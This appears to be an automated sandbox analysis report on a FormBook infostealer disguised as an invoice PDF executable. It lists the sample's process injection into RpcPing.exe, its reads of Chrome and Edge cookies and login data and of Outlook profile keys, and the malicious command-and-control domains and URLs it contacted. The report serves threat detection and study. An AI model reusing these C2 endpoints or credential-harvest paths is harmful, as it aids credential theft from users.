Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523775 Sample: ORIGINAL INVOICE COAU723073... Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 33 www.kartal-nakliyat.xyz 2->33 35 www.yippie.world 2->35 37 5 other IPs or domains 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 8 other signatures 2->53 10 ORIGINAL INVOICE COAU7230734298.pdf.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 31 ORIGINAL INVOICE C...0734298.pdf.exe.log, ASCII 10->31 dropped 67 Injects a PE file into a foreign processes 10->67 14 ORIGINAL INVOICE COAU7230734298.pdf.exe 10->14         started        17 ORIGINAL INVOICE COAU7230734298.pdf.exe 10->17         started        signatures6 process7 signatures8 69 Maps a DLL or memory area into another process 14->69 19 fFUkGixTNm.exe 14->19 injected process9 signatures10 55 Found direct / indirect Syscall (likely to bypass EDR) 19->55 22 RpcPing.exe 13 19->22         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 22->57 59 Tries to harvest and steal browser information (history, passwords, etc) 22->59 61 Modifies the context of a thread in another process (thread injection) 22->61 63 3 other signatures 22->63 25 fFUkGixTNm.exe 22->25 injected 29 firefox.exe 22->29         started        process13 dnsIp14 39 natroredirect.natrocdn.com 85.159.66.93, 56825, 56826, 56827 CIZGITR Turkey 25->39 41 www.sidqwdf.fun 185.106.176.204, 56829, 56830, 56831 AS_LYREG3FR United Kingdom 25->41 43 2 other IPs or domains 25->43 65 Found direct / indirect Syscall (likely to bypass EDR) 25->65 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
52.223.13.41
 www.resellnexa.shop United States
8987 AMAZONEXPANSIONGB true
185.106.176.204
 www.sidqwdf.fun United Kingdom
204212 AS_LYREG3FR true
3.33.130.190
 yippie.world United States
8987 AMAZONEXPANSIONGB false
85.159.66.93
 natroredirect.natrocdn.com Turkey
34619 CIZGITR true

Contacted Domains

Name IP Active
www.sidqwdf.fun 185.106.176.204 true
www.resellnexa.shop 52.223.13.41 true
yippie.world 3.33.130.190 true
natroredirect.natrocdn.com 85.159.66.93 true
www.yippie.world unknown unknown
www.kartal-nakliyat.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.kartal-nakliyat.xyz/n8ew/ true
    		unknown
    http://www.kartal-nakliyat.xyz/n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhov true
      		unknown
      http://www.sidqwdf.fun/c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhov true
        		unknown
        http://www.yippie.world/pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI= false
          		unknown
          http://www.resellnexa.shop/sfpe/ true
            		unknown
            http://www.sidqwdf.fun/c6mm/ true unknown
            http://www.resellnexa.shop/sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov true
              		unknown